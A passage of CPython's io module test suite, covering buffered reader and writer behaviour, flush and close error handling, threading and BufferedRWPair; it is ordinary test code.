self.assertFalse(closed[0]) # flush() called before file closed
f.flush = lambda: None # break reference loop
def test_flush_error_on_close(self):
# raw file
# Issue #5700: io.FileIO calls flush() after file closed
self.check_flush_error_on_close(support.TESTFN, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0)
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', buffering=0, closefd=False)
os.close(fd)
# buffered io
self.check_flush_error_on_close(support.TESTFN, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'wb', closefd=False)
os.close(fd)
# text io
self.check_flush_error_on_close(support.TESTFN, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w')
fd = os.open(support.TESTFN, os.O_WRONLY|os.O_CREAT)
self.check_flush_error_on_close(fd, 'w', closefd=False)
os.close(fd)
def test_multi_close(self):
f = self.open(support.TESTFN, "wb", buffering=0)
f.close()
f.close()
f.close()
self.assertRaises(ValueError, f.flush)
def test_RawIOBase_read(self):
# Exercise the default RawIOBase.read() implementation (which calls
# readinto() internally).
rawio = self.MockRawIOWithoutRead((b"abc", b"d", None, b"efg", None))
self.assertEqual(rawio.read(2), b"ab")
self.assertEqual(rawio.read(2), b"c")
self.assertEqual(rawio.read(2), b"d")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"ef")
self.assertEqual(rawio.read(2), b"g")
self.assertEqual(rawio.read(2), None)
self.assertEqual(rawio.read(2), b"")
def test_types_have_dict(self):
test = (
self.IOBase(),
self.RawIOBase(),
self.TextIOBase(),
self.StringIO(),
self.BytesIO()
)
for obj in test:
self.assertTrue(hasattr(obj, "__dict__"))
def test_opener(self):
with self.open(support.TESTFN, "w") as f:
f.write("egg\n")
fd = os.open(support.TESTFN, os.O_RDONLY)
def opener(path, flags):
return fd
with self.open("non-existent", "r", opener=opener) as f:
self.assertEqual(f.read(), "egg\n")
def test_fileio_closefd(self):
# Issue #4841
with self.open(__file__, 'rb') as f1, \
self.open(__file__, 'rb') as f2:
fileio = self.FileIO(f1.fileno(), closefd=False)
# .__init__() must not close f1
fileio.__init__(f2.fileno(), closefd=False)
f1.readline()
# .close() must not close f2
fileio.close()
f2.readline()
def test_nonbuffered_textio(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', buffering=0)
support.gc_collect()
self.assertEqual(recorded, [])
def test_invalid_newline(self):
with warnings.catch_warnings(record=True) as recorded:
with self.assertRaises(ValueError):
self.open(support.TESTFN, 'w', newline='invalid')
support.gc_collect()
self.assertEqual(recorded, [])
class CIOTest(IOTest):
def test_IOBase_finalize(self):
# Issue #12149: segmentation fault on _PyIOBase_finalize when both a
# class which inherits IOBase and an object of this class are caught
# in a reference cycle and close() is already in the method cache.
class MyIO(self.IOBase):
def close(self):
pass
# create an instance to populate the method cache
MyIO()
obj = MyIO()
obj.obj = obj
wr = weakref.ref(obj)
del MyIO
del obj
support.gc_collect()
self.assertTrue(wr() is None, wr)
class PyIOTest(IOTest):
pass
@support.cpython_only
class APIMismatchTest(unittest.TestCase):
def test_RawIOBase_io_in_pyio_match(self):
"""Test that pyio RawIOBase class has all c RawIOBase methods"""
mismatch = support.detect_api_mismatch(pyio.RawIOBase, io.RawIOBase,
ignore=('__weakref__',))
self.assertEqual(mismatch, set(), msg='Python RawIOBase does not have all C RawIOBase methods')
def test_RawIOBase_pyio_in_io_match(self):
"""Test that c RawIOBase class has all pyio RawIOBase methods"""
mismatch = support.detect_api_mismatch(io.RawIOBase, pyio.RawIOBase)
self.assertEqual(mismatch, set(), msg='C RawIOBase does not have all Python RawIOBase methods')
class CommonBufferedTests:
# Tests common to BufferedReader, BufferedWriter and BufferedRandom
def test_detach(self):
raw = self.MockRawIO()
buf = self.tp(raw)
self.assertIs(buf.detach(), raw)
self.assertRaises(ValueError, buf.detach)
repr(buf) # Should still work
def test_fileno(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertEqual(42, bufio.fileno())
@unittest.skip('test having existential crisis')
def test_no_fileno(self):
# XXX will we always have fileno() function? If so, kill
# this test. Else, write it.
pass
def test_invalid_args(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
# Invalid whence
self.assertRaises(ValueError, bufio.seek, 0, -1)
self.assertRaises(ValueError, bufio.seek, 0, 9)
def test_override_destructor(self):
tp = self.tp
record = []
class MyBufferedIO(tp):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
rawio = self.MockRawIO()
bufio = MyBufferedIO(rawio)
writable = bufio.writable()
del bufio
support.gc_collect()
if writable:
self.assertEqual(record, [1, 2, 3])
else:
self.assertEqual(record, [1, 2])
def test_context_manager(self):
# Test usability as a context manager
rawio = self.MockRawIO()
bufio = self.tp(rawio)
def _with():
with bufio:
pass
_with()
# bufio should now be closed, and using it a second time should raise
# a ValueError.
self.assertRaises(ValueError, _with)
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.tp(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
def test_repr(self):
raw = self.MockRawIO()
b = self.tp(raw)
clsname = "%s.%s" % (self.tp.__module__, self.tp.__qualname__)
self.assertEqual(repr(b), "<%s>" % clsname)
raw.name = "dummy"
self.assertEqual(repr(b), "<%s name='dummy'>" % clsname)
raw.name = b"dummy"
self.assertEqual(repr(b), "<%s name=b'dummy'>" % clsname)
def test_flush_error_on_close(self):
# Test that buffered file is closed despite failed flush
# and that flush() is called before file closed.
raw = self.MockRawIO()
closed = []
def bad_flush():
closed[:] = [b.closed, raw.closed]
raise OSError()
raw.flush = bad_flush
b = self.tp(raw)
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
self.assertTrue(raw.closed)
self.assertTrue(closed) # flush() called
self.assertFalse(closed[0]) # flush() called before file closed
self.assertFalse(closed[1])
raw.flush = lambda: None # break reference loop
def test_close_error_on_close(self):
raw = self.MockRawIO()
def bad_flush():
raise OSError('flush')
def bad_close():
raise OSError('close')
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(OSError) as err: # exception not swallowed
b.close()
self.assertEqual(err.exception.args, ('close',))
self.assertIsInstance(err.exception.__context__, OSError)
self.assertEqual(err.exception.__context__.args, ('flush',))
self.assertFalse(b.closed)
def test_nonnormalized_close_error_on_close(self):
# Issue #21677
raw = self.MockRawIO()
def bad_flush():
raise non_existing_flush
def bad_close():
raise non_existing_close
raw.close = bad_close
b = self.tp(raw)
b.flush = bad_flush
with self.assertRaises(NameError) as err: # exception not swallowed
b.close()
self.assertIn('non_existing_close', str(err.exception))
self.assertIsInstance(err.exception.__context__, NameError)
self.assertIn('non_existing_flush', str(err.exception.__context__))
self.assertFalse(b.closed)
def test_multi_close(self):
raw = self.MockRawIO()
b = self.tp(raw)
b.close()
b.close()
b.close()
self.assertRaises(ValueError, b.flush)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
def test_readonly_attributes(self):
raw = self.MockRawIO()
buf = self.tp(raw)
x = self.MockRawIO()
with self.assertRaises(AttributeError):
buf.raw = x
class SizeofTest:
@support.cpython_only
def test_sizeof(self):
bufsize1 = 4096
bufsize2 = 8192
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize1)
size = sys.getsizeof(bufio) - bufsize1
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize2)
self.assertEqual(sys.getsizeof(bufio), size + bufsize2)
@support.cpython_only
def test_buffer_freeing(self) :
bufsize = 4096
rawio = self.MockRawIO()
bufio = self.tp(rawio, buffer_size=bufsize)
size = sys.getsizeof(bufio) - bufsize
bufio.close()
self.assertEqual(sys.getsizeof(bufio), size)
class BufferedReaderTest(unittest.TestCase, CommonBufferedTests):
read_mode = "rb"
def test_constructor(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(b"abc", bufio.read())
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
rawio = self.MockRawIO([b"abc"])
bufio.__init__(rawio)
self.assertEqual(b"abc", bufio.read())
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.read, 0)
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.read(0), b'')
def test_read(self):
for arg in (None, 7):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(arg))
# Invalid args
self.assertRaises(ValueError, bufio.read, -2)
def test_read1(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"a", bufio.read(1))
self.assertEqual(b"b", bufio.read1(1))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"c", bufio.read1(100))
self.assertEqual(rawio._reads, 1)
self.assertEqual(b"d", bufio.read1(100))
self.assertEqual(rawio._reads, 2)
self.assertEqual(b"efg", bufio.read1(100))
self.assertEqual(rawio._reads, 3)
self.assertEqual(b"", bufio.read1(100))
self.assertEqual(rawio._reads, 4)
# Invalid args
self.assertRaises(ValueError, bufio.read1, -1)
def test_readinto(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
b = bytearray(2)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"cd")
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ef")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"gf")
self.assertEqual(bufio.readinto(b), 0)
self.assertEqual(b, b"gf")
rawio = self.MockRawIO((b"abc", None))
bufio = self.tp(rawio)
self.assertEqual(bufio.readinto(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(bufio.readinto(b), 1)
self.assertEqual(b, b"cb")
def test_readinto1(self):
buffer_size = 10
rawio = self.MockRawIO((b"abc", b"de", b"fgh", b"jkl"))
bufio = self.tp(rawio, buffer_size=buffer_size)
b = bytearray(2)
self.assertEqual(bufio.peek(3), b'abc')
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"ab")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 1)
self.assertEqual(b[:1], b"c")
self.assertEqual(rawio._reads, 1)
self.assertEqual(bufio.readinto1(b), 2)
self.assertEqual(b, b"de")
self.assertEqual(rawio._reads, 2)
b = bytearray(2*buffer_size)
self.assertEqual(bufio.peek(3), b'fgh')
self.assertEqual(rawio._reads, 3)
self.assertEqual(bufio.readinto1(b), 6)
self.assertEqual(b[:6], b"fghjkl")
self.assertEqual(rawio._reads, 4)
def test_readinto_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readinto1_array(self):
buffer_size = 60
data = b"a" * 26
rawio = self.MockRawIO((data,))
bufio = self.tp(rawio, buffer_size=buffer_size)
# Create an array with element size > 1 byte
b = array.array('i', b'x' * 32)
assert len(b) != 16
# Read into it. We should get as many *bytes* as we can fit into b
# (which is more than the number of elements)
n = bufio.readinto1(b)
self.assertGreater(n, len(b))
# Check that old contents of b are preserved
bm = memoryview(b).cast('B')
self.assertLess(n, len(bm))
self.assertEqual(bm[:n], data[:n])
self.assertEqual(bm[n:], b'x' * (len(bm[n:])))
def test_readlines(self):
def bufio():
rawio = self.MockRawIO((b"abc\n", b"d\n", b"ef"))
return self.tp(rawio)
self.assertEqual(bufio().readlines(), [b"abc\n", b"d\n", b"ef"])
self.assertEqual(bufio().readlines(5), [b"abc\n", b"d\n"])
self.assertEqual(bufio().readlines(None), [b"abc\n", b"d\n", b"ef"])
def test_buffering(self):
data = b"abcdefghi"
dlen = len(data)
tests = [
[ 100, [ 3, 1, 4, 8 ], [ dlen, 0 ] ],
[ 100, [ 3, 3, 3], [ dlen ] ],
[ 4, [ 1, 2, 4, 2 ], [ 4, 4, 1 ] ],
]
for bufsize, buf_read_sizes, raw_read_sizes in tests:
rawio = self.MockFileIO(data)
bufio = self.tp(rawio, buffer_size=bufsize)
pos = 0
for nbytes in buf_read_sizes:
self.assertEqual(bufio.read(nbytes), data[pos:pos+nbytes])
pos += nbytes
# this is mildly implementation-dependent
self.assertEqual(rawio.read_history, raw_read_sizes)
def test_read_non_blocking(self):
# Inject some None's in there to simulate EWOULDBLOCK
rawio = self.MockRawIO((b"abc", b"d", None, b"efg", None, None, None))
bufio = self.tp(rawio)
self.assertEqual(b"abcd", bufio.read(6))
self.assertEqual(b"e", bufio.read(1))
self.assertEqual(b"fg", bufio.read())
self.assertEqual(b"", bufio.peek(1))
self.assertIsNone(bufio.read())
self.assertEqual(b"", bufio.read())
rawio = self.MockRawIO((b"a", None, None))
self.assertEqual(b"a", rawio.readall())
self.assertIsNone(rawio.readall())
def test_read_past_eof(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read(9000))
def test_read_all(self):
rawio = self.MockRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertEqual(b"abcdefg", bufio.read())
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes with exactly the same number of 0's,
# 1's... 255's. This will help us check that concurrent reading
# doesn't duplicate or forget contents.
N = 1000
l = list(range(256)) * N
random.shuffle(l)
s = bytes(bytearray(l))
with self.open(support.TESTFN, "wb") as f:
f.write(s)
with self.open(support.TESTFN, self.read_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
results = []
def f():
try:
# Intra-buffer read then buffer-flushing read
for n in cycle([1, 19]):
s = bufio.read(n)
if not s:
break
# list.append() is atomic
results.append(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
s = b''.join(results)
for i in range(256):
c = bytes(bytearray([i]))
self.assertEqual(s.count(c), N)
finally:
support.unlink(support.TESTFN)
def test_unseekable(self):
bufio = self.tp(self.MockUnseekableIO(b"A" * 10))
self.assertRaises(self.UnsupportedOperation, bufio.tell)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
bufio.read(1)
self.assertRaises(self.UnsupportedOperation, bufio.seek, 0)
self.assertRaises(self.UnsupportedOperation, bufio.tell)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
def test_no_extraneous_read(self):
# Issue #9550; when the raw IO object has satisfied the read request,
# we should not issue any additional reads, otherwise it may block
# (e.g. socket).
bufsize = 16
for n in (2, bufsize - 1, bufsize, bufsize + 1, bufsize * 2):
rawio = self.MockRawIO([b"x" * n])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
# Simple case: one raw read is enough to satisfy the request.
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
# A more complex case where two raw reads are needed to satisfy
# the request.
rawio = self.MockRawIO([b"x" * (n - 1), b"x"])
bufio = self.tp(rawio, bufsize)
self.assertEqual(bufio.read(n), b"x" * n)
self.assertEqual(rawio._extraneous_reads, 0,
"failed for {}: {} != 0".format(n, rawio._extraneous_reads))
def test_read_on_closed(self):
# Issue #23796
b = io.BufferedReader(io.BytesIO(b"12"))
b.read(1)
b.close()
self.assertRaises(ValueError, b.peek)
self.assertRaises(ValueError, b.read1, 1)
class CBufferedReaderTest(BufferedReaderTest, SizeofTest):
tp = io.BufferedReader
def test_constructor(self):
BufferedReaderTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO([b"abc"])
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.read)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.read)
def test_misbehaved_io_read(self):
rawio = self.MisbehavedRawIO((b"abc", b"d", b"efg"))
bufio = self.tp(rawio)
# _pyio.BufferedReader seems to implement reading different, so that
# checking this is not so easy.
self.assertRaises(OSError, bufio.read, 10)
def test_garbage_collection(self):
# C BufferedReader objects are collected.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.f = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedReader"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedReaderTest(BufferedReaderTest):
tp = pyio.BufferedReader
class BufferedWriterTest(unittest.TestCase, CommonBufferedTests):
write_mode = "wb"
def test_constructor(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
bufio.__init__(rawio)
bufio.__init__(rawio, buffer_size=1024)
bufio.__init__(rawio, buffer_size=16)
self.assertEqual(3, bufio.write(b"abc"))
bufio.flush()
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
bufio.__init__(rawio)
self.assertEqual(3, bufio.write(b"ghi"))
bufio.flush()
self.assertEqual(b"".join(rawio._write_stack), b"abcghi")
def test_uninitialized(self):
bufio = self.tp.__new__(self.tp)
del bufio
bufio = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
bufio.write, b'')
bufio.__init__(self.MockRawIO())
self.assertEqual(bufio.write(b''), 0)
def test_detach_flush(self):
raw = self.MockRawIO()
buf = self.tp(raw)
buf.write(b"howdy!")
self.assertFalse(raw._write_stack)
buf.detach()
self.assertEqual(raw._write_stack, [b"howdy!"])
def test_write(self):
# Write to the buffered IO but don't overflow the buffer.
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
self.assertFalse(writer._write_stack)
def test_write_overflow(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
contents = b"abcdefghijklmnop"
for n in range(0, len(contents), 3):
bufio.write(contents[n:n+3])
flushed = b"".join(writer._write_stack)
# At least (total - 8) bytes were implicitly flushed, perhaps more
# depending on the implementation.
self.assertTrue(flushed.startswith(contents[:-8]), flushed)
def check_writes(self, intermediate_func):
# Lots of writes, test the flushed output is as expected.
contents = bytes(range(256)) * 1000
n = 0
writer = self.MockRawIO()
bufio = self.tp(writer, 13)
# Generator of write sizes: repeat each N 15 times then proceed to N+1
def gen_sizes():
for size in count(1):
for i in range(15):
yield size
sizes = gen_sizes()
while n < len(contents):
size = min(next(sizes), len(contents) - n)
self.assertEqual(bufio.write(contents[n:n+size]), size)
intermediate_func(bufio)
n += size
bufio.flush()
self.assertEqual(contents, b"".join(writer._write_stack))
def test_writes(self):
self.check_writes(lambda bufio: None)
def test_writes_and_flushes(self):
self.check_writes(lambda bufio: bufio.flush())
def test_writes_and_seeks(self):
def _seekabs(bufio):
pos = bufio.tell()
bufio.seek(pos + 1, 0)
bufio.seek(pos - 1, 0)
bufio.seek(pos, 0)
self.check_writes(_seekabs)
def _seekrel(bufio):
pos = bufio.seek(0, 1)
bufio.seek(+1, 1)
bufio.seek(-1, 1)
bufio.seek(pos, 0)
self.check_writes(_seekrel)
def test_writes_and_truncates(self):
self.check_writes(lambda bufio: bufio.truncate(bufio.tell()))
def test_write_non_blocking(self):
raw = self.MockNonBlockWriterIO()
bufio = self.tp(raw, 8)
self.assertEqual(bufio.write(b"abcd"), 4)
self.assertEqual(bufio.write(b"efghi"), 5)
# 1 byte will be written, the rest will be buffered
raw.block_on(b"k")
self.assertEqual(bufio.write(b"jklmn"), 5)
# 8 bytes will be written, 8 will be buffered and the rest will be lost
raw.block_on(b"0")
try:
bufio.write(b"opqrwxyz0123456789")
except self.BlockingIOError as e:
written = e.characters_written
else:
self.fail("BlockingIOError should have been raised")
self.assertEqual(written, 16)
self.assertEqual(raw.pop_written(),
b"abcdefghijklmnopqrwxyz")
self.assertEqual(bufio.write(b"ABCDEFGHI"), 9)
s = raw.pop_written()
# Previously buffered bytes were flushed
self.assertTrue(s.startswith(b"01234567A"), s)
def test_write_and_rewind(self):
raw = io.BytesIO()
bufio = self.tp(raw, 4)
self.assertEqual(bufio.write(b"abcdef"), 6)
self.assertEqual(bufio.tell(), 6)
bufio.seek(0, 0)
self.assertEqual(bufio.write(b"XY"), 2)
bufio.seek(6, 0)
self.assertEqual(raw.getvalue(), b"XYcdef")
self.assertEqual(bufio.write(b"123456"), 6)
bufio.flush()
self.assertEqual(raw.getvalue(), b"XYcdef123456")
def test_flush(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
bufio.flush()
self.assertEqual(b"abc", writer._write_stack[0])
def test_writelines(self):
l = [b'ab', b'cd', b'ef']
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_userlist(self):
l = UserList([b'ab', b'cd', b'ef'])
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.writelines(l)
bufio.flush()
self.assertEqual(b''.join(writer._write_stack), b'abcdef')
def test_writelines_error(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
self.assertRaises(TypeError, bufio.writelines, [1, 2, 3])
self.assertRaises(TypeError, bufio.writelines, None)
self.assertRaises(TypeError, bufio.writelines, 'abc')
def test_destructor(self):
writer = self.MockRawIO()
bufio = self.tp(writer, 8)
bufio.write(b"abc")
del bufio
support.gc_collect()
self.assertEqual(b"abc", writer._write_stack[0])
def test_truncate(self):
# Truncate implicitly flushes the buffer.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
bufio.write(b"abcdef")
self.assertEqual(bufio.truncate(3), 3)
self.assertEqual(bufio.tell(), 6)
with self.open(support.TESTFN, "rb", buffering=0) as f:
self.assertEqual(f.read(), b"abc")
@unittest.skipUnless(threading, 'Threading required for this test.')
@support.requires_resource('cpu')
def test_threads(self):
try:
# Write out many bytes from many threads and test they were
# all flushed.
N = 1000
contents = bytes(range(256)) * N
sizes = cycle([1, 19])
n = 0
queue = deque()
while n < len(contents):
size = next(sizes)
queue.append(contents[n:n+size])
n += size
del contents
# We use a real file object because it allows us to
# exercise situations where the GIL is released before
# writing the buffer to the raw streams. This is in addition
# to concurrency issues due to switching threads in the middle
# of Python code.
with self.open(support.TESTFN, self.write_mode, buffering=0) as raw:
bufio = self.tp(raw, 8)
errors = []
def f():
try:
while True:
try:
s = queue.popleft()
except IndexError:
return
bufio.write(s)
except Exception as e:
errors.append(e)
raise
threads = [threading.Thread(target=f) for x in range(20)]
with support.start_threads(threads):
time.sleep(0.02) # yield
self.assertFalse(errors,
"the following exceptions were caught: %r" % errors)
bufio.close()
with self.open(support.TESTFN, "rb") as f:
s = f.read()
for i in range(256):
self.assertEqual(s.count(bytes([i])), N)
finally:
support.unlink(support.TESTFN)
def test_misbehaved_io(self):
rawio = self.MisbehavedRawIO()
bufio = self.tp(rawio, 5)
self.assertRaises(OSError, bufio.seek, 0)
self.assertRaises(OSError, bufio.tell)
self.assertRaises(OSError, bufio.write, b"abcdef")
def test_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), 8, 12)
def test_write_error_on_close(self):
raw = self.MockRawIO()
def bad_write(b):
raise OSError()
raw.write = bad_write
b = self.tp(raw)
b.write(b'spam')
self.assertRaises(OSError, b.close) # exception not swallowed
self.assertTrue(b.closed)
class CBufferedWriterTest(BufferedWriterTest, SizeofTest):
tp = io.BufferedWriter
def test_constructor(self):
BufferedWriterTest.test_constructor(self)
# The allocation can succeed on 32-bit builds, e.g. with more
# than 2GB RAM and a 64-bit kernel.
if sys.maxsize > 0x7FFFFFFF:
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises((OverflowError, MemoryError, ValueError),
bufio.__init__, rawio, sys.maxsize)
def test_initialization(self):
rawio = self.MockRawIO()
bufio = self.tp(rawio)
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=0)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-16)
self.assertRaises(ValueError, bufio.write, b"def")
self.assertRaises(ValueError, bufio.__init__, rawio, buffer_size=-1)
self.assertRaises(ValueError, bufio.write, b"def")
def test_garbage_collection(self):
# C BufferedWriter objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends into gc.garbage instead
with support.check_warnings(('', ResourceWarning)):
rawio = self.FileIO(support.TESTFN, "w+b")
f = self.tp(rawio)
f.write(b"123xxx")
f.x = f
wr = weakref.ref(f)
del f
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"123xxx")
def test_args_error(self):
# Issue #17275
with self.assertRaisesRegex(TypeError, "BufferedWriter"):
self.tp(io.BytesIO(), 1024, 1024, 1024)
class PyBufferedWriterTest(BufferedWriterTest):
tp = pyio.BufferedWriter
class BufferedRWPairTest(unittest.TestCase):
def test_constructor(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertFalse(pair.closed)
def test_uninitialized(self):
pair = self.tp.__new__(self.tp)
del pair
pair = self.tp.__new__(self.tp)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.read, 0)
self.assertRaisesRegex((ValueError, AttributeError),
'uninitialized|has no attribute',
pair.write, b'')
pair.__init__(self.MockRawIO(), self.MockRawIO())
self.assertEqual(pair.read(0), b'')
self.assertEqual(pair.write(b''), 0)
def test_detach(self):
pair = self.tp(self.MockRawIO(), self.MockRawIO())
self.assertRaises(self.UnsupportedOperation, pair.detach)
def test_constructor_max_buffer_size_removal(self):
with self.assertRaises(TypeError):
self.tp(self.MockRawIO(), self.MockRawIO(), 8, 12)
def test_constructor_with_not_readable(self):
class NotReadable(MockRawIO):
def readable(self):
return False
self.assertRaises(OSError, self.tp, NotReadable(), self.MockRawIO())
def test_constructor_with_not_writeable(self):
class NotWriteable(MockRawIO):
def writable(self):
return False
self.assertRaises(OSError, self.tp, self.MockRawIO(), NotWriteable())
def test_read(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read(3), b"abc")
self.assertEqual(pair.read(1), b"d")
self.assertEqual(pair.read(), b"ef")
pair = self.tp(self.BytesIO(b"abc"), self.MockRawIO())
self.assertEqual(pair.read(None), b"abc")
def test_readlines(self):
pair = lambda: self.tp(self.BytesIO(b"abc\ndef\nh"), self.MockRawIO())
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(), [b"abc\n", b"def\n", b"h"])
self.assertEqual(pair().readlines(5), [b"abc\n", b"def\n"])
def test_read1(self):
# .read1() is delegated to the underlying reader object, so this test
# can be shallow.
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
self.assertEqual(pair.read1(3), b"abc")
def test_readinto(self):
pair = self.tp(self.BytesIO(b"abcdef"), self.MockRawIO())
data = bytearray(5)
self.assertEqual(pair.readinto(data), 5)
self.assertEqual(data, b"abcde")
def test_write(self):
w = self.MockRawIO()
pair = self.tp(self.MockRawIO(), w)
pair.write(b"abc")
pair.flush()
pair.write(b"def")
pair.flush()
self.assertEqual(w._write_stack, [b"abc", b"def"])
def test_peek(self):
